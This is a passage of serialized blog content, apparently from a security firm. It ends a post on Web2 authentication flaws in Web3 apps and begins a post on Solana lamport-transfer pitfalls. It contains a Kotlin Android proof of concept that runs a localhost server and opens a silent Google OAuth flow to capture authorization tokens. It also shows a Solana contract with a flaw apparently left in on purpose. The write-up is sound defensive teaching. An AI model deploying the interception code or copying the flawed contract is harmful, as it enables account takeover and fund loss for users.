",{"type":24,"tag":301,"props":77135,"children":77136},{"style":10246},[77137],{"type":30,"value":77138},"AppCompatActivity",{"type":24,"tag":301,"props":77140,"children":77141},{"style":359},[77142],{"type":30,"value":3883},{"type":24,"tag":301,"props":77144,"children":77145},{"class":303,"line":320},[77146],{"type":24,"tag":301,"props":77147,"children":77148},{"emptyLinePlaceholder":16},[77149],{"type":30,"value":341},{"type":24,"tag":301,"props":77151,"children":77152},{"class":303,"line":335},[77153,77158,77162,77167,77172,77177],{"type":24,"tag":301,"props":77154,"children":77155},{"style":348},[77156],{"type":30,"value":77157}," override",{"type":24,"tag":301,"props":77159,"children":77160},{"style":348},[77161],{"type":30,"value":13026},{"type":24,"tag":301,"props":77163,"children":77164},{"style":314},[77165],{"type":30,"value":77166}," onCreate",{"type":24,"tag":301,"props":77168,"children":77169},{"style":359},[77170],{"type":30,"value":77171},"(savedInstanceState: ",{"type":24,"tag":301,"props":77173,"children":77174},{"style":10246},[77175],{"type":30,"value":77176},"Bundle",{"type":24,"tag":301,"props":77178,"children":77179},{"style":359},[77180],{"type":30,"value":77181},"?) {\n",{"type":24,"tag":301,"props":77183,"children":77184},{"class":303,"line":344},[77185,77190,77194,77199],{"type":24,"tag":301,"props":77186,"children":77187},{"style":348},[77188],{"type":30,"value":77189}," super",{"type":24,"tag":301,"props":77191,"children":77192},{"style":359},[77193],{"type":30,"value":206},{"type":24,"tag":301,"props":77195,"children":77196},{"style":314},[77197],{"type":30,"value":77198},"onCreate",{"type":24,"tag":301,"props":77200,"children":77201},{"style":359},[77202],{"type":30,"value":77203},"(savedInstanceState)\n",{"type":24,"tag":301,"props":77205,"children":77206},{"class":303,"line":401},[77207],{"type":24,"tag":301,"props":77208,"children":77209},{"emptyLinePlaceholder":16},[77210],{"type":30,"value":341},{"type":24,"tag":301,"props":77212,"children":77213},{"class":303,"line":415},[77214],{"type":24,"tag":301,"props":77215,"children":77216},{"style":1062},[77217],{"type":30,"value":77218}," // Start the Ktor web server\n",{"type":24,"tag":301,"props":77220,"children":77221},{"class":303,"line":439},[77222,77227,77232,77237],{"type":24,"tag":301,"props":77223,"children":77224},{"style":314},[77225],{"type":30,"value":77226}," CoroutineScope",{"type":24,"tag":301,"props":77228,"children":77229},{"style":359},[77230],{"type":30,"value":77231},"(Dispatchers.IO).",{"type":24,"tag":301,"props":77233,"children":77234},{"style":314},[77235],{"type":30,"value":77236},"launch",{"type":24,"tag":301,"props":77238,"children":77239},{"style":359},[77240],{"type":30,"value":3035},{"type":24,"tag":301,"props":77242,"children":77243},{"class":303,"line":447},[77244,77249],{"type":24,"tag":301,"props":77245,"children":77246},{"style":308},[77247],{"type":30,"value":77248}," try",{"type":24,"tag":301,"props":77250,"children":77251},{"style":359},[77252],{"type":30,"value":3035},{"type":24,"tag":301,"props":77254,"children":77255},{"class":303,"line":476},[77256,77261],{"type":24,"tag":301,"props":77257,"children":77258},{"style":314},[77259],{"type":30,"value":77260}," startWebServer",{"type":24,"tag":301,"props":77262,"children":77263},{"style":359},[77264],{"type":30,"value":14551},{"type":24,"tag":301,"props":77266,"children":77267},{"class":303,"line":495},[77268,77273,77278,77282,77287,77291,77296],{"type":24,"tag":301,"props":77269,"children":77270},{"style":359},[77271],{"type":30,"value":77272}," Log.",{"type":24,"tag":301,"props":77274,"children":77275},{"style":314},[77276],{"type":30,"value":77277},"d",{"type":24,"tag":301,"props":77279,"children":77280},{"style":359},[77281],{"type":30,"value":362},{"type":24,"tag":301,"props":77283,"children":77284},{"style":329},[77285],{"type":30,"value":77286},"\"WebServer\"",{"type":24,"tag":301,"props":77288,"children":77289},{"style":359},[77290],{"type":30,"value":377},{"type":24,"tag":301,"props":77292,"children":77293},{"style":329},[77294],{"type":30,"value":77295},"\"Server started on http://localhost:3000\"",{"type":24,"tag":301,"props":77297,"children":77298},{"style":359},[77299],{"type":30,"value":791},{"type":24,"tag":301,"props":77301,"children":77302},{"class":303,"line":504},[77303,77308,77312,77317,77322],{"type":24,"tag":301,"props":77304,"children":77305},{"style":359},[77306],{"type":30,"value":77307}," } ",{"type":24,"tag":301,"props":77309,"children":77310},{"style":348},[77311],{"type":30,"value":55146},{"type":24,"tag":301,"props":77313,"children":77314},{"style":359},[77315],{"type":30,"value":77316}," (e: ",{"type":24,"tag":301,"props":77318,"children":77319},{"style":10246},[77320],{"type":30,"value":77321},"Exception",{"type":24,"tag":301,"props":77323,"children":77324},{"style":359},[77325],{"type":30,"value":398},{"type":24,"tag":301,"props":77327,"children":77328},{"class":303,"line":512},[77329,77333,77337,77341,77345,77349,77354,77358,77363,77367,77371],{"type":24,"tag":301,"props":77330,"children":77331},{"style":359},[77332],{"type":30,"value":77272},{"type":24,"tag":301,"props":77334,"children":77335},{"style":314},[77336],{"type":30,"value":58179},{"type":24,"tag":301,"props":77338,"children":77339},{"style":359},[77340],{"type":30,"value":362},{"type":24,"tag":301,"props":77342,"children":77343},{"style":329},[77344],{"type":30,"value":77286},{"type":24,"tag":301,"props":77346,"children":77347},{"style":359},[77348],{"type":30,"value":377},{"type":24,"tag":301,"props":77350,"children":77351},{"style":329},[77352],{"type":30,"value":77353},"\"Error starting server: ",{"type":24,"tag":301,"props":77355,"children":77356},{"style":348},[77357],{"type":30,"value":40857},{"type":24,"tag":301,"props":77359,"children":77360},{"style":385},[77361],{"type":30,"value":77362},"e.message",{"type":24,"tag":301,"props":77364,"children":77365},{"style":348},[77366],{"type":30,"value":40889},{"type":24,"tag":301,"props":77368,"children":77369},{"style":329},[77370],{"type":30,"value":9408},{"type":24,"tag":301,"props":77372,"children":77373},{"style":359},[77374],{"type":30,"value":77375},", e)\n",{"type":24,"tag":301,"props":77377,"children":77378},{"class":303,"line":592},[77379],{"type":24,"tag":301,"props":77380,"children":77381},{"style":359},[77382],{"type":30,"value":65600},{"type":24,"tag":301,"props":77384,"children":77385},{"class":303,"line":619},[77386],{"type":24,"tag":301,"props":77387,"children":77388},{"style":359},[77389],{"type":30,"value":3345},{"type":24,"tag":301,"props":77391,"children":77392},{"class":303,"line":635},[77393],{"type":24,"tag":301,"props":77394,"children":77395},{"emptyLinePlaceholder":16},[77396],{"type":30,"value":341},{"type":24,"tag":301,"props":77398,"children":77399},{"class":303,"line":643},[77400],{"type":24,"tag":301,"props":77401,"children":77402},{"style":1062},[77403],{"type":30,"value":77404}," // Open the Google OAuth page\n",{"type":24,"tag":301,"props":77406,"children":77407},{"class":303,"line":652},[77408,77413,77418,77422],{"type":24,"tag":301,"props":77409,"children":77410},{"style":348},[77411],{"type":30,"value":77412}," val",{"type":24,"tag":301,"props":77414,"children":77415},{"style":359},[77416],{"type":30,"value":77417}," googleOAuthUrl ",{"type":24,"tag":301,"props":77419,"children":77420},{"style":385},[77421],{"type":30,"value":523},{"type":24,"tag":301,"props":77423,"children":77424},{"style":329},[77425],{"type":30,"value":77426}," \"https://accounts.google.com/o/oauth2/v2/auth?client_id=redacted&scope=openid%20email%20profile&response_type=code&redirect_uri=http%3A%2F%2Flocalhost%3A3000%2Fapi%2Fauth%2Fcallback%2Fgoogle&prompt=none&access_type=offline&state=2UTJ8naHVglSQQupa1jw1lugsaZr8f5M9hxZp7bxISM&code_challenge=e6_Onj804xizwJzVT5Pf8luKPbtLV-EJssR7I58UQp8&code_challenge_method=S256&service=lso&o2v=2&ddm=1&flowName=GeneralOAuthFlow\"\n",{"type":24,"tag":301,"props":77428,"children":77429},{"class":303,"line":666},[77430,77434,77439,77443,77448,77453,77457],{"type":24,"tag":301,"props":77431,"children":77432},{"style":348},[77433],{"type":30,"value":77412},{"type":24,"tag":301,"props":77435,"children":77436},{"style":359},[77437],{"type":30,"value":77438}," browserIntent ",{"type":24,"tag":301,"props":77440,"children":77441},{"style":385},[77442],{"type":30,"value":523},{"type":24,"tag":301,"props":77444,"children":77445},{"style":314},[77446],{"type":30,"value":77447}," Intent",{"type":24,"tag":301,"props":77449,"children":77450},{"style":359},[77451],{"type":30,"value":77452},"(Intent.ACTION_VIEW, Uri.",{"type":24,"tag":301,"props":77454,"children":77455},{"style":314},[77456],{"type":30,"value":45949},{"type":24,"tag":301,"props":77458,"children":77459},{"style":359},[77460],{"type":30,"value":77461},"(googleOAuthUrl))\n",{"type":24,"tag":301,"props":77463,"children":77464},{"class":303,"line":674},[77465,77470],{"type":24,"tag":301,"props":77466,"children":77467},{"style":314},[77468],{"type":30,"value":77469}," startActivity",{"type":24,"tag":301,"props":77471,"children":77472},{"style":359},[77473],{"type":30,"value":77474},"(browserIntent)\n",{"type":24,"tag":301,"props":77476,"children":77477},{"class":303,"line":692},[77478],{"type":24,"tag":301,"props":77479,"children":77480},{"style":359},[77481],{"type":30,"value":501},{"type":24,"tag":301,"props":77483,"children":77484},{"class":303,"line":3631},[77485],{"type":24,"tag":301,"props":77486,"children":77487},{"emptyLinePlaceholder":16},[77488],{"type":30,"value":341},{"type":24,"tag":301,"props":77490,"children":77491},{"class":303,"line":3639},[77492,77497,77501,77506],{"type":24,"tag":301,"props":77493,"children":77494},{"style":348},[77495],{"type":30,"value":77496}," private",{"type":24,"tag":301,"props":77498,"children":77499},{"style":348},[77500],{"type":30,"value":13026},{"type":24,"tag":301,"props":77502,"children":77503},{"style":314},[77504],{"type":30,"value":77505}," startWebServer",{"type":24,"tag":301,"props":77507,"children":77508},{"style":359},[77509],{"type":30,"value":3883},{"type":24,"tag":301,"props":77511,"children":77512},{"class":303,"line":3647},[77513,77518,77523,77527,77532],{"type":24,"tag":301,"props":77514,"children":77515},{"style":314},[77516],{"type":30,"value":77517}," embeddedServer",{"type":24,"tag":301,"props":77519,"children":77520},{"style":359},[77521],{"type":30,"value":77522},"(CIO, port ",{"type":24,"tag":301,"props":77524,"children":77525},{"style":385},[77526],{"type":30,"value":523},{"type":24,"tag":301,"props":77528,"children":77529},{"style":466},[77530],{"type":30,"value":77531}," 3000",{"type":24,"tag":301,"props":77533,"children":77534},{"style":359},[77535],{"type":30,"value":398},{"type":24,"tag":301,"props":77537,"children":77538},{"class":303,"line":3685},[77539,77544],{"type":24,"tag":301,"props":77540,"children":77541},{"style":314},[77542],{"type":30,"value":77543}," routing",{"type":24,"tag":301,"props":77545,"children":77546},{"style":359},[77547],{"type":30,"value":3035},{"type":24,"tag":301,"props":77549,"children":77550},{"class":303,"line":3713},[77551,77556,77560,77565],{"type":24,"tag":301,"props":77552,"children":77553},{"style":348},[77554],{"type":30,"value":77555}," get",{"type":24,"tag":301,"props":77557,"children":77558},{"style":359},[77559],{"type":30,"value":362},{"type":24,"tag":301,"props":77561,"children":77562},{"style":329},[77563],{"type":30,"value":77564},"\"{...}\"",{"type":24,"tag":301,"props":77566,"children":77567},{"style":359},[77568],{"type":30,"value":398},{"type":24,"tag":301,"props":77570,"children":77571},{"class":303,"line":3721},[77572,77577,77582],{"type":24,"tag":301,"props":77573,"children":77574},{"style":359},[77575],{"type":30,"value":77576}," call.",{"type":24,"tag":301,"props":77578,"children":77579},{"style":314},[77580],{"type":30,"value":77581},"respondHtml",{"type":24,"tag":301,"props":77583,"children":77584},{"style":359},[77585],{"type":30,"value":3035},{"type":24,"tag":301,"props":77587,"children":77588},{"class":303,"line":3751},[77589,77594],{"type":24,"tag":301,"props":77590,"children":77591},{"style":314},[77592],{"type":30,"value":77593}," head",{"type":24,"tag":301,"props":77595,"children":77596},{"style":359},[77597],{"type":30,"value":3035},{"type":24,"tag":301,"props":77599,"children":77600},{"class":303,"line":3782},[77601,77606,77611,77615,77620],{"type":24,"tag":301,"props":77602,"children":77603},{"style":314},[77604],{"type":30,"value":77605}," meta",{"type":24,"tag":301,"props":77607,"children":77608},{"style":359},[77609],{"type":30,"value":77610},"(charset ",{"type":24,"tag":301,"props":77612,"children":77613},{"style":385},[77614],{"type":30,"value":523},{"type":24,"tag":301,"props":77616,"children":77617},{"style":329},[77618],{"type":30,"value":77619}," \"UTF-8\"",{"type":24,"tag":301,"props":77621,"children":77622},{"style":359},[77623],{"type":30,"value":791},{"type":24,"tag":301,"props":77625,"children":77626},{"class":303,"line":3791},[77627,77631,77636,77640,77645,77650,77654,77659],{"type":24,"tag":301,"props":77628,"children":77629},{"style":314},[77630],{"type":30,"value":77605},{"type":24,"tag":301,"props":77632,"children":77633},{"style":359},[77634],{"type":30,"value":77635},"(name ",{"type":24,"tag":301,"props":77637,"children":77638},{"style":385},[77639],{"type":30,"value":523},{"type":24,"tag":301,"props":77641,"children":77642},{"style":329},[77643],{"type":30,"value":77644}," \"viewport\"",{"type":24,"tag":301,"props":77646,"children":77647},{"style":359},[77648],{"type":30,"value":77649},", content ",{"type":24,"tag":301,"props":77651,"children":77652},{"style":385},[77653],{"type":30,"value":523},{"type":24,"tag":301,"props":77655,"children":77656},{"style":329},[77657],{"type":30,"value":77658}," \"width=device-width, initial-scale=1.0\"",{"type":24,"tag":301,"props":77660,"children":77661},{"style":359},[77662],{"type":30,"value":791},{"type":24,"tag":301,"props":77664,"children":77665},{"class":303,"line":3819},[77666,77671,77675,77680],{"type":24,"tag":301,"props":77667,"children":77668},{"style":314},[77669],{"type":30,"value":77670}," title",{"type":24,"tag":301,"props":77672,"children":77673},{"style":359},[77674],{"type":30,"value":362},{"type":24,"tag":301,"props":77676,"children":77677},{"style":329},[77678],{"type":30,"value":77679},"\"OAuth Redirect\"",{"type":24,"tag":301,"props":77681,"children":77682},{"style":359},[77683],{"type":30,"value":791},{"type":24,"tag":301,"props":77685,"children":77686},{"class":303,"line":4397},[77687],{"type":24,"tag":301,"props":77688,"children":77689},{"style":359},[77690],{"type":30,"value":77691}," }\n",{"type":24,"tag":301,"props":77693,"children":77694},{"class":303,"line":4405},[77695,77700],{"type":24,"tag":301,"props":77696,"children":77697},{"style":314},[77698],{"type":30,"value":77699}," body",{"type":24,"tag":301,"props":77701,"children":77702},{"style":359},[77703],{"type":30,"value":3035},{"type":24,"tag":301,"props":77705,"children":77706},{"class":303,"line":4422},[77707,77712,77716,77720,77725],{"type":24,"tag":301,"props":77708,"children":77709},{"style":314},[77710],{"type":30,"value":77711}," h1",{"type":24,"tag":301,"props":77713,"children":77714},{"style":359},[77715],{"type":30,"value":16392},{"type":24,"tag":301,"props":77717,"children":77718},{"style":385},[77719],{"type":30,"value":11206},{"type":24,"tag":301,"props":77721,"children":77722},{"style":329},[77723],{"type":30,"value":77724},"\"Google OAuth Redirect\"",{"type":24,"tag":301,"props":77726,"children":77727},{"style":359},[77728],{"type":30,"value":16401},{"type":24,"tag":301,"props":77730,"children":77731},{"class":303,"line":4438},[77732,77737],{"type":24,"tag":301,"props":77733,"children":77734},{"style":314},[77735],{"type":30,"value":77736}," script",{"type":24,"tag":301,"props":77738,"children":77739},{"style":359},[77740],{"type":30,"value":3035},{"type":24,"tag":301,"props":77742,"children":77743},{"class":303,"line":4446},[77744,77749],{"type":24,"tag":301,"props":77745,"children":77746},{"style":385},[77747],{"type":30,"value":77748}," +",{"type":24,"tag":301,"props":77750,"children":77751},{"style":329},[77752],{"type":30,"value":77753},"\"document.body.innerText = location.search;\"\n",{"type":24,"tag":301,"props":77755,"children":77756},{"class":303,"line":4506},[77757],{"type":24,"tag":301,"props":77758,"children":77759},{"style":359},[77760],{"type":30,"value":77761}," }\n",{"type":24,"tag":301,"props":77763,"children":77764},{"class":303,"line":4566},[77765],{"type":24,"tag":301,"props":77766,"children":77767},{"style":359},[77768],{"type":30,"value":77691},{"type":24,"tag":301,"props":77770,"children":77771},{"class":303,"line":4574},[77772],{"type":24,"tag":301,"props":77773,"children":77774},{"style":359},[77775],{"type":30,"value":77776}," }\n",{"type":24,"tag":301,"props":77778,"children":77779},{"class":303,"line":4590},[77780],{"type":24,"tag":301,"props":77781,"children":77782},{"style":359},[77783],{"type":30,"value":4211},{"type":24,"tag":301,"props":77785,"children":77786},{"class":303,"line":4599},[77787],{"type":24,"tag":301,"props":77788,"children":77789},{"style":359},[77790],{"type":30,"value":65600},{"type":24,"tag":301,"props":77792,"children":77793},{"class":303,"line":4629},[77794,77799,77804,77809,77813,77817],{"type":24,"tag":301,"props":77795,"children":77796},{"style":359},[77797],{"type":30,"value":77798}," }.",{"type":24,"tag":301,"props":77800,"children":77801},{"style":314},[77802],{"type":30,"value":77803},"start",{"type":24,"tag":301,"props":77805,"children":77806},{"style":359},[77807],{"type":30,"value":77808},"(wait ",{"type":24,"tag":301,"props":77810,"children":77811},{"style":385},[77812],{"type":30,"value":523},{"type":24,"tag":301,"props":77814,"children":77815},{"style":348},[77816],{"type":30,"value":3440},{"type":24,"tag":301,"props":77818,"children":77819},{"style":359},[77820],{"type":30,"value":791},{"type":24,"tag":301,"props":77822,"children":77823},{"class":303,"line":4659},[77824],{"type":24,"tag":301,"props":77825,"children":77826},{"style":359},[77827],{"type":30,"value":501},{"type":24,"tag":301,"props":77829,"children":77830},{"class":303,"line":4668},[77831],{"type":24,"tag":301,"props":77832,"children":77833},{"style":359},[77834],{"type":30,"value":698},{"type":24,"tag":32,"props":77836,"children":77837},{},[77838],{"type":30,"value":77839},"The code essentially creates a localhost web server and redirects the user to the OAuth authorization screen, which can be automatically bypassed under certain conditionswithout any user interaction. Once the authorization process is completed, the OAuth flow redirects the user back to the localhost server, including the secret authorization token in the query string.",{"type":24,"tag":32,"props":77841,"children":77842},{},[77843],{"type":30,"value":77844},"Since the attacker controls the localhost server, they can intercept and extract the token, enabling them to take over the victim's account.",{"type":24,"tag":80,"props":77846,"children":77848},{"id":77847},"mitigation-1",[77849],{"type":30,"value":47072},{"type":24,"tag":32,"props":77851,"children":77852},{},[77853,77855,77860],{"type":30,"value":77854},"As a mitigation measure, it is crucial to ensure that localhost servers are not whitelisted in the OAuth ",{"type":24,"tag":145,"props":77856,"children":77858},{"className":77857},[],[77859],{"type":30,"value":76478},{"type":30,"value":77861}," parameter. If whitelisting localhost is necessary due to specific business requirements, a custom solution must be carefully designed and implemented to safeguard the account security of all users.",{"type":24,"tag":43,"props":77863,"children":77864},{"id":9652},[77865],{"type":30,"value":9655},{"type":24,"tag":32,"props":77867,"children":77868},{},[77869],{"type":30,"value":77870},"In this article, we explored three lesser-known classes of vulnerabilities present in Web2 authentication flows utilized by Web3 dApps, shedding light on critical but often overlooked security risks. Authentication processes are inherently complex, and this complexity leaves room for vulnerabilities to persist unnoticed in applications.",{"type":24,"tag":32,"props":77872,"children":77873},{},[77874],{"type":30,"value":77875},"By uncovering and analyzing these vulnerabilities, we aim to stress the necessity of adopting a robust, holistic approach to authentication security. As Web3 continues to evolve, bridging the gap between traditional Web2 frameworks and the decentralized Web3 ecosystem is not just an opportunity but an imperative to safeguard users and their data.",{"type":24,"tag":9672,"props":77877,"children":77878},{},[77879],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":77881},[77882,77889,77894,77897],{"id":76246,"depth":320,"text":76249,"children":77883},[77884,77885,77886,77887,77888],{"id":76257,"depth":335,"text":76260},{"id":76284,"depth":335,"text":76287},{"id":76345,"depth":335,"text":76348},{"id":76402,"depth":335,"text":76405},{"id":76501,"depth":335,"text":76504},{"id":76547,"depth":320,"text":76550,"children":77890},[77891,77892,77893],{"id":76553,"depth":335,"text":76556},{"id":76580,"depth":335,"text":76583},{"id":47069,"depth":335,"text":47072},{"id":77029,"depth":320,"text":77032,"children":77895},[77896],{"id":77847,"depth":335,"text":47072},{"id":9652,"depth":320,"text":9655},"content:blog:2025-03-07-subverting-web2-authentication-in-web3.md","blog/2025-03-07-subverting-web2-authentication-in-web3.md","blog/2025-03-07-subverting-web2-authentication-in-web3",{"_path":77902,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":77903,"description":77904,"author":47188,"image":77905,"date":77907,"isFeatured":16,"tags":77908,"onBlogPage":16,"body":77909,"_type":9700,"_id":82562,"_source":9702,"_file":82563,"_stem":82564,"_extension":9705},"/blog/2025-05-14-king-of-the-sol","Solana: The hidden dangers of lamport transfers","Solana’s lamport transfer logic hides dangerous edge cases — from rent-exemption quirks to write-demotion traps. We dissect a deceptively simple smart contract game to expose how transfers to arbitrary accounts can silently fail, brick your program, or crown an eternal king.",{"src":77906,"height":15,"width":15},"/posts/king-of-the-sol/king-of-the-sol.png","2025-05-14",[9717],{"type":21,"children":77910,"toc":82551},[77911,77915,77920,77934,77940,77945,77975,77980,77985,79023,79028,79036,79041,79047,79053,79065,79098,79110,79123,79135,79580,79585,79631,79637,79642,79729,79734,79748,79761,80423,80428,80440,80446,80457,80469,80623,80637,80656,80677,80683,80688,81033,81038,81044,81063,81077,81699,81704,81724,81729,81734,81740,81752,81773,81948,81954,81959,82260,82281,82293,82305,82389,82409,82421,82427,82439,82445,82450,82473,82485,82491,82503,82508,82514,82519,82524,82542,82547],{"type":24,"tag":43,"props":77912,"children":77913},{"id":35771},[77914],{"type":30,"value":35774},{"type":24,"tag":32,"props":77916,"children":77917},{},[77918],{"type":30,"value":77919},"Is it safe to transfer lamports to an arbitrary address on Solana? The answer might surprise you.",{"type":24,"tag":32,"props":77921,"children":77922},{},[77923,77925,77932],{"type":30,"value":77924},"In this post, we explore a deceptively simple smart contract game inspired by ",{"type":24,"tag":188,"props":77926,"children":77929},{"href":77927,"rel":77928},"https://www.kingoftheether.com/thrones/kingoftheether/index.html",[192],[77930],{"type":30,"value":77931},"King of the Ether",{"type":30,"value":77933},". Through it, we’ll highlight subtle pitfalls in Solana’s account model that can brick your program — especially when it comes to transferring lamports.",{"type":24,"tag":43,"props":77935,"children":77937},{"id":77936},"the-game-king-of-the-sol",[77938],{"type":30,"value":77939},"The Game: King of the SOL",{"type":24,"tag":32,"props":77941,"children":77942},{},[77943],{"type":30,"value":77944},"The game works like this:",{"type":24,"tag":2655,"props":77946,"children":77947},{},[77948,77960,77965,77970],{"type":24,"tag":2659,"props":77949,"children":77950},{},[77951,77953,77958],{"type":30,"value":77952},"Anyone can become the ",{"type":24,"tag":60,"props":77954,"children":77955},{},[77956],{"type":30,"value":77957},"king",{"type":30,"value":77959}," by bidding at least 2× the previous bid.",{"type":24,"tag":2659,"props":77961,"children":77962},{},[77963],{"type":30,"value":77964},"The old king is reimbursed 95% of their bid.",{"type":24,"tag":2659,"props":77966,"children":77967},{},[77968],{"type":30,"value":77969},"The remaining 5% goes into a prize pot.",{"type":24,"tag":2659,"props":77971,"children":77972},{},[77973],{"type":30,"value":77974},"If the reigning king survives for 10 days without being dethroned, they can claim the entire pot.",{"type":24,"tag":32,"props":77976,"children":77977},{},[77978],{"type":30,"value":77979},"Simple, right?",{"type":24,"tag":32,"props":77981,"children":77982},{},[77983],{"type":30,"value":77984},"This is the core logic:",{"type":24,"tag":291,"props":77986,"children":77988},{"className":9818,"code":77987,"language":9817,"meta":7,"style":7},"#[derive(Accounts)]\npub struct ChangeKing\u003C'info> {\n #[account(mut)]\n pub throne: Account\u003C'info, Throne>,\n\n /// CHECK: old_king gets a 95% refund, so ensure its writable.\n #[account(mut, constraint = old_king.key() == throne.king)]\n pub old_king: AccountInfo\u003C'info>,\n\n /// CHECK: any writable account is allowed as a new king.\n #[account(mut)]\n pub new_king: AccountInfo\u003C'info>,\n\n #[account(mut)]\n pub payer: Signer\u003C'info>,\n}\n\n#[program]\npub mod king_of_the_sol {\n pub fn change_king(ctx: Context\u003CChangeKing>, bid_amount: u64) -> Result\u003C()> {\n // Check that bid_amount is at least 2x last_bid_amount\n assert!(bid_amount >= ctx.accounts.throne.last_bid_amount * 2);\n transfer_from_signer(\n &ctx.accounts.payer,\n &ctx.accounts.throne.to_account_info(),\n bid_amount,\n )?;\n\n // Reimburse 95% of the last bid to the old king\n let to_reimburse = (ctx.accounts.throne.last_bid_amount * 9500) / 10000;\n transfer_from_pda(\n &ctx.accounts.throne.to_account_info(),\n &ctx.accounts.old_king,\n to_reimburse,\n )?;\n\n // Set new king\n ctx.accounts.throne.king = ctx.accounts.new_king.key();\n ctx.accounts.throne.last_bid_amount = bid_amount;\n ctx.accounts.throne.last_time = Clock::get()?.unix_timestamp as u64;\n\n Ok(())\n }\n}\n",[77989],{"type":24,"tag":145,"props":77990,"children":77991},{"__ignoreMap":7},[77992,78007,78035,78050,78091,78098,78106,78157,78188,78195,78203,78218,78250,78257,78272,78303,78310,78317,78325,78342,78416,78424,78485,78497,78525,78565,78577,78593,78600,78608,78682,78694,78733,78761,78773,78788,78795,78803,78873,78917,78991,78998,79009,79016],{"type":24,"tag":301,"props":77993,"children":77994},{"class":303,"line":304},[77995,77999,78003],{"type":24,"tag":301,"props":77996,"children":77997},{"style":359},[77998],{"type":30,"value":29605},{"type":24,"tag":301,"props":78000,"children":78001},{"style":10246},[78002],{"type":30,"value":29610},{"type":24,"tag":301,"props":78004,"children":78005},{"style":359},[78006],{"type":30,"value":27029},{"type":24,"tag":301,"props":78008,"children":78009},{"class":303,"line":320},[78010,78014,78018,78023,78027,78031],{"type":24,"tag":301,"props":78011,"children":78012},{"style":348},[78013],{"type":30,"value":20484},{"type":24,"tag":301,"props":78015,"children":78016},{"style":348},[78017],{"type":30,"value":27920},{"type":24,"tag":301,"props":78019,"children":78020},{"style":10246},[78021],{"type":30,"value":78022}," ChangeKing",{"type":24,"tag":301,"props":78024,"children":78025},{"style":359},[78026],{"type":30,"value":29690},{"type":24,"tag":301,"props":78028,"children":78029},{"style":10246},[78030],{"type":30,"value":29695},{"type":24,"tag":301,"props":78032,"children":78033},{"style":359},[78034],{"type":30,"value":14097},{"type":24,"tag":301,"props":78036,"children":78037},{"class":303,"line":335},[78038,78042,78046],{"type":24,"tag":301,"props":78039,"children":78040},{"style":359},[78041],{"type":30,"value":29896},{"type":24,"tag":301,"props":78043,"children":78044},{"style":348},[78045],{"type":30,"value":10550},{"type":24,"tag":301,"props":78047,"children":78048},{"style":359},[78049],{"type":30,"value":27029},{"type":24,"tag":301,"props":78051,"children":78052},{"class":303,"line":344},[78053,78057,78062,78066,78070,78074,78078,78082,78087],{"type":24,"tag":301,"props":78054,"children":78055},{"style":348},[78056],{"type":30,"value":27612},{"type":24,"tag":301,"props":78058,"children":78059},{"style":369},[78060],{"type":30,"value":78061}," throne",{"type":24,"tag":301,"props":78063,"children":78064},{"style":385},[78065],{"type":30,"value":1679},{"type":24,"tag":301,"props":78067,"children":78068},{"style":10246},[78069],{"type":30,"value":29861},{"type":24,"tag":301,"props":78071,"children":78072},{"style":359},[78073],{"type":30,"value":29690},{"type":24,"tag":301,"props":78075,"children":78076},{"style":10246},[78077],{"type":30,"value":29695},{"type":24,"tag":301,"props":78079,"children":78080},{"style":359},[78081],{"type":30,"value":377},{"type":24,"tag":301,"props":78083,"children":78084},{"style":10246},[78085],{"type":30,"value":78086},"Throne",{"type":24,"tag":301,"props":78088,"children":78089},{"style":359},[78090],{"type":30,"value":12957},{"type":24,"tag":301,"props":78092,"children":78093},{"class":303,"line":401},[78094],{"type":24,"tag":301,"props":78095,"children":78096},{"emptyLinePlaceholder":16},[78097],{"type":30,"value":341},{"type":24,"tag":301,"props":78099,"children":78100},{"class":303,"line":415},[78101],{"type":24,"tag":301,"props":78102,"children":78103},{"style":1062},[78104],{"type":30,"value":78105}," /// CHECK: old_king gets a 95% refund, so ensure its writable.\n",{"type":24,"tag":301,"props":78107,"children":78108},{"class":303,"line":439},[78109,78113,78117,78122,78126,78131,78135,78140,78144,78148,78152],{"type":24,"tag":301,"props":78110,"children":78111},{"style":359},[78112],{"type":30,"value":29896},{"type":24,"tag":301,"props":78114,"children":78115},{"style":348},[78116],{"type":30,"value":10550},{"type":24,"tag":301,"props":78118,"children":78119},{"style":359},[78120],{"type":30,"value":78121},", constraint ",{"type":24,"tag":301,"props":78123,"children":78124},{"style":385},[78125],{"type":30,"value":523},{"type":24,"tag":301,"props":78127,"children":78128},{"style":359},[78129],{"type":30,"value":78130}," old_king",{"type":24,"tag":301,"props":78132,"children":78133},{"style":385},[78134],{"type":30,"value":206},{"type":24,"tag":301,"props":78136,"children":78137},{"style":359},[78138],{"type":30,"value":78139},"key() ",{"type":24,"tag":301,"props":78141,"children":78142},{"style":385},[78143],{"type":30,"value":607},{"type":24,"tag":301,"props":78145,"children":78146},{"style":359},[78147],{"type":30,"value":78061},{"type":24,"tag":301,"props":78149,"children":78150},{"style":385},[78151],{"type":30,"value":206},{"type":24,"tag":301,"props":78153,"children":78154},{"style":359},[78155],{"type":30,"value":78156},"king)]\n",{"type":24,"tag":301,"props":78158,"children":78159},{"class":303,"line":447},[78160,78164,78168,78172,78176,78180,78184],{"type":24,"tag":301,"props":78161,"children":78162},{"style":348},[78163],{"type":30,"value":27612},{"type":24,"tag":301,"props":78165,"children":78166},{"style":369},[78167],{"type":30,"value":78130},{"type":24,"tag":301,"props":78169,"children":78170},{"style":385},[78171],{"type":30,"value":1679},{"type":24,"tag":301,"props":78173,"children":78174},{"style":10246},[78175],{"type":30,"value":32154},{"type":24,"tag":301,"props":78177,"children":78178},{"style":359},[78179],{"type":30,"value":29690},{"type":24,"tag":301,"props":78181,"children":78182},{"style":10246},[78183],{"type":30,"value":29695},{"type":24,"tag":301,"props":78185,"children":78186},{"style":359},[78187],{"type":30,"value":12957},{"type":24,"tag":301,"props":78189,"children":78190},{"class":303,"line":476},[78191],{"type":24,"tag":301,"props":78192,"children":78193},{"emptyLinePlaceholder":16},[78194],{"type":30,"value":341},{"type":24,"tag":301,"props":78196,"children":78197},{"class":303,"line":495},[78198],{"type":24,"tag":301,"props":78199,"children":78200},{"style":1062},[78201],{"type":30,"value":78202}," /// CHECK: any writable account is allowed as a new 